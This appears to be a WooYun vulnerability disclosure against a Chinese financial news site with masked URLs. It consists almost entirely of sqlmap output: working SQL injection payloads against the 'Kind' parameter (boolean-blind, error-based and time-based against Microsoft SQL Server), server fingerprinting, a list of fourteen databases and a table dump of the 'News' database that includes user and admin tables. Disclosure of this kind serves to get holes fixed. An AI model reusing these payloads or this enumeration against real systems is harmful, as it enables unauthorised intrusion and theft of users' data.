WooYun.org

http://**.**.**.**/News/Default.aspx?Kind=c00001
http://**.**.**.**/hk/industrymore.aspx?q=Block

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Kind (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Kind=c00001' AND 4379=4379 AND 'nWHD'='nWHD
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Kind=c00001' AND 9281=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9281=9281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'FGZO'='FGZO
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: Kind=c00001' AND 8769=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'OYYN'='OYYN
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] His_TTGame
[*] master
[*] model
[*] msdb
[*] News
[*] newstmpmessage
[*] ReportServer
[*] ReportServerTempDB
[*] SHEX_Game
[*] StockData
[*] tempdb
[*] Tsci_tt
[*] tt180
[*] TTGame
Database: News
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dbo.NS_MessageKinds_bak201508    | 1168587 |
| dbo.ObjectRelation               | 1069242 |
| dbo.NS_MessageKinds              | 466832  |
| dbo.NS_Message                   | 323364  |
| dbo.NS_Announcement              | 264046  |
| dbo.Channel_Message              | 195370  |
| dbo.NS_US_news                   | 139042  |
| dbo.NS_PickMessage               | 124636  |
| dbo.View_KindNews                | 120312  |
| dbo.NS_MessageKinds_bakJanyo     | 105599  |
| dbo.NS_PickMessageHistory        | 101098  |
| dbo.NS_MessageKinds20130523      | 94807   |
| dbo.Query                        | 87429   |
| dbo.TT_HKNotice                  | 86563   |
| dbo.UserSubscribeChannel         | 54730   |
| dbo.TMP_PickMessage              | 31699   |
| dbo.tmpall                       | 23181   |
| dbo.TT_News_Hot                  | 11734   |
| dbo.NS_RecordLog                 | 4512    |
| dbo.view_NewsLists               | 3322    |
| dbo.TT_User                      | 3041    |
| dbo.TT_User_bak                  | 2457    |
| dbo.stockcode                    | 2022    |
| dbo.tempNS_PickMessage           | 1921    |
| dbo.TT_CustomSTK                 | 1834    |
| dbo.News_Comments                | 1228    |
| dbo.HotNewstag                   | 1065    |
| dbo.NS_NewsSendMsg               | 1035    |
| dbo.TT_HKNotice_bak              | 1000    |
| dbo.FocusNews                    | 791     |
| dbo.view_EveryDayEditCountByUser | 393     |
| dbo.TT_BBS                       | 298     |
| dbo.view_jyb_news_comments       | 246     |
| dbo.TT_User_Do                   | 245     |
| dbo.GeneralWords                 | 238     |
| dbo.CommonChannel                | 191     |
| dbo.view_jyb_hotNews             | 42      |
| dbo.NS_NewsPageSettings          | 31      |
| dbo.tmpaaaaa                     | 22      |
| dbo.V_PageSetings                | 20      |
| dbo.NS_Admin                     | 19      |
| dbo.Company                      | 15      |
| dbo.NS_subKinds                  | 15      |
| dbo.View_IM_CompanyLists         | 12      |
| dbo.LSB                          | 11      |
| dbo.NS_NewsMoveStat              | 8       |
| dbo.tempExceptHot                | 7       |
| dbo.D99_REG                      | 1       |
| dbo.NS_UserGetEditPickNews       | 1       |
+----------------------------------+---------+